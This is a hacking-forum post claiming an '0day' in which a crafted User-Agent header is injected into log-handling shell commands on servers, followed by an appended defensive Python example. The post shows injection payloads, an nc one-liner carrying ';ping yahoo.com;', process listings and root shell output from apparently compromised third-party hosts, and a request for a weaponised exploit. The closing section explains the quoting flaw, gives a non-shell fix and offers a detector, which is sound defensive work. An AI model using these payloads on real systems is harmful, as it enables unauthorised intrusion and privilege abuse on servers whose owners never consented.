UstupidMF

0day sys logd, repository, awstats, rotatelogs


Posted (edited)

So, for about 2 weeks I've been struggling with my CGI scanner and with LFIs; as a joke I put this into sprintf(get,"GET %s%s HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ystem(\'cd etc ... r\nHost: %s\r\nConnection: Close\r\n\r\n",dir,file,ip);

and I started scanning for all kinds of LFIs. As soon as I launched the scan, I saw lots of servers coming in with uid0 :D. Very strange; I kept looking through them to understand what was going on, how they were coming to me directly as root.

This got me even more confused:

6788 ? S 0:00 /realsentry/wsp/gui/interface/bin/wsp-gui -k restart

9573 ? Ss 0:00 /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php

9814 ? SN 0:00 sh -c php /realsentry/wsp/gui/core/tools_system/send_syslog.php '[bLOCKED INTERNAL][2581809048] : 2010/06/21 18:44:01 - HEADER(3): User-Agent = ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)'

that was bug 1

21130 ? S 0:01 /usr/bin/perl -w /var/log/apache2/folderize /var/log/apache2

10573 ? S 0:00 sh -c echo '74.54.0.0 - - [21/Jun/2010:19:18:59 +0200] "GET HTTP/1.1 HTTP/1.1" 400 351 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"' >> "/var/log/apache2/vhost_ip.log"sh-2.05b# sent 32, rcvd 10248

the second

2029 ? S 0:00 /usr/bin/perl /usr/imjm/scripts/access2msg.pl

2031 ? S 14:54 /usr/bin/perl /usr/imjm/scripts/access2msg_healthcheck.pl

2032 ? S 6:57 /usr/bin/perl /usr/imjm/scripts/access2msg_localhost.pl

2350 ? S 0:00 sh -c echo '94.199.0.0 - - [20/Jun/2010:02:39:28 +0900] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 211 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 124.110.94.18 80 983 -' >> /tmp/access_count/mon_err_log_localhost

the third

cat /proc/2733/cmdline

sh-cecho '74.54.0.0 - - [21/Jun/2010:23:45:22 +0900] "GET /index.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 281 "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" - -' >> /tmp/access_count/accesslog

this one scared me

25977 ? SN 0:00 sh -c /bin/bash -c 'CL="0"; CT=0; for ((i=0;i<=128;i++)); do if [ -z "$(sudo mpt-status -i $i -s 2>&1 | egrep "no SCSI disks attached|mptctl")" ]; then let CT=$CT+$(sudo mpt-status -i $i -s | egrep -v "(OPTIMAL|ONLINE)" | wc -l); CL="1"; fi; done; ([ "${CL}" -eq "0" ] && echo 1) || echo ${CT}'

24728 ? D 0:08 /usr/bin/webalizer -c /var/www/web33/.configs/webalizer.conf

19858 ? Ss 0:00 /bin/bash -c /usr/share/confixx/runwebalizer.sh

I quickly shouted for buffer to help me and I found another bug

echo -n -e "GET / HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ';ping yahoo.com;'\r\nHost: ip atacat\r\n\r\n" |nc ip atacat 80

There is surely one vulnerability that ties all of these together, it's just that I'm not able to find it :D. They have completely baffled me; if you have any idea and want more details, leave me a message.

realsentry/wsp/tools/php/php /realsentry/wsp/gui/core/parser/parser.php 1 idi1 graceful Warning: fopen(/dev/fd/0): failed to open stream: No such device or address in /realsentry/wsp/gui/core/parser/parser.php on line 12

/dev/fd/0

/realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php od[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Resuming normal operation (pid 10825) [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Security database clean up. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: No logs security found [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check disks status. [2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check the size of log files with no rotation configured. /bin/sh: line 6: 10825 Killed /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php

/usr/bin/perl /usr/imjm/scripts/access2msg_md.pl

/bin/sh /command/svscanboot

$outpath = "/tmp/access_count";

if( ! mkdir( $work ) ){
    unlink( $pidfile ) or &logger( "WAR: Can't remove $pidfile" );
    &error_exit( $@, "WAR: Can't make $work" );
}
chmod( 0711, $work );
chown( "root", "pf", $work );
}

ls -all /tmp/access_count/accesslog -rw-r--r-- 1 red swing 0 Jun 22 02:57 /tmp/access_count/accesslog

2.4.21-37.EL #1 Wed Sep 7 13:35:21 EDT 2005 i686 i686 i386 GNU/Linux uid=1000(red) gid=1000(swing) groups=1000(swing) sh: no job control in this shell sh-2.05b$

Don't be peasants and keep it to yourselves; I hope I'll get a message with the developed sploit :D

Credits xbuffer and me :D

[0] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php [1] => -e [2] => 7iBoxCron.Exec; ) _SERVER["argc"] => 3 _ENV["SHELL"] => /bin/sh _ENV["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin _ENV["PWD"] => /root _ENV["LANG"] => en_US.ISO-8859-15 _ENV["SHLVL"] => 1 _ENV["HOME"] => /root _ENV["LOGNAME"] => root _ENV["_"] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php

_GET["SessionProcess"] => 7iExecMain.php _GET["SessionPriority"] => High _GET["SessionId"] => a9627114cdf99d5be8547af0d51d1daa _GET["Download"] => 0 _GET["DownloadFile"] => _GET["SessionEvalstring"] => ; include_once('/opt/7i/lib/_Bin/_1a_Controller/_Controller/_controllermain.inc'); _ControllerMain('0','a9627114cdf99d5be8547af0d51d1daa','','',$_COOKIE,$_ENV,$_FILES,$_GET,$_POST,@$GLOBALS['HTTP_RAW_POST_DATA'],$_SERVER,'',''); _SERVER["SHELL"] => /bin/sh _SERVER["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Edited by UstupidMF
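What the process listings in the post have in common is a log-forwarding script that hands the raw access-log line to the shell as `sh -c echo '<line>' >> <file>`, so the User-Agent ends up inside a single-quoted shell string. The following is an added example, not code from the original post or from any of the products named in it; it assumes Python and Apache combined log format, and the sample log lines and IPs are constructed. It shows from the defender's side why that wrapper is injectable, what the non-shell replacement looks like, and a small detector for the tell-tale character in the User-Agent field.

```python
# Added example (not from the original post).  Vulnerable pattern, its fix,
# and a triage detector for Apache combined-format access logs.
import os
import re
import tempfile

# Apache "combined" log format; the User-Agent is the last double-quoted field.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Characters that can end a single-quoted shell string or expand inside a
# double-quoted one.  A bare ';' is deliberately not listed: it is harmless
# inside '...' and appears in almost every legitimate User-Agent
# ("compatible; MSIE 6.0; ...").
SHELL_BREAKOUT = ("'", "`", "$(", "${")


def unsafe_forward_command(line, path):
    """The command the vulnerable scripts in the thread effectively run.
    Inside '...' the shell treats every character literally EXCEPT a single
    quote, so one quote in the attacker-controlled User-Agent terminates the
    echo argument and the remainder of the line is parsed as shell syntax.
    Built here for illustration only; it is never executed."""
    return "sh -c echo '%s' >> %s" % (line, path)


def escapes_single_quotes(line):
    """True if `line` would terminate the '...' wrapper built above."""
    return "'" in line


def safe_append(line, path):
    """The fix: append with plain file I/O.  No shell is involved, so no
    character in the line carries any meaning.  The same applies to Perl's
    open(..., '>>') or PHP's file_put_contents(..., FILE_APPEND)."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(line.rstrip("\n") + "\n")


def parse_combined(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def flag_suspicious(lines):
    """Return (ip, user_agent, markers) for lines whose User-Agent carries a
    shell break-out character.  This is a triage signal only; the control
    that actually matters is never passing log text through a shell."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        markers = [m for m in SHELL_BREAKOUT if m in rec["ua"]]
        if markers:
            hits.append((rec["ip"], rec["ua"], markers))
    return hits


# Constructed sample lines; the IPs come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jun/2010:19:18:59 +0200] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '198.51.100.7 - - [21/Jun/2010:19:19:03 +0200] "GET /index.php HTTP/1.1" 404 281 "-" '
    '"Mozilla/4.0 (compatible; it\'s a test; Windows 98)"',
    '203.0.113.5 - - [21/Jun/2010:19:19:10 +0200] "GET /x HTTP/1.1" 403 211 "-" '
    '"curl/7.19 ${HOME}"',
]


def demo():
    """Flag the constructed lines, then store all of them without a shell."""
    hits = flag_suspicious(SAMPLE_LOG)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "accesslog")
        for line in SAMPLE_LOG:
            safe_append(line, path)  # the quote-bearing line is stored verbatim
        with open(path, encoding="utf-8") as fh:
            stored = fh.read().splitlines()
    return hits, stored


if __name__ == "__main__":
    found, kept = demo()
    for ip, ua, markers in found:
        print("suspicious User-Agent from %s: %r (markers %s)" % (ip, ua, markers))
    print("%d lines appended without invoking a shell" % len(kept))
```

Run it directly to see the two flagged lines; the key point is that `safe_append` stores the quote-bearing line byte for byte, whereas the string returned by `unsafe_forward_command` for that same line would be parsed by `sh` with the quote closed early.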
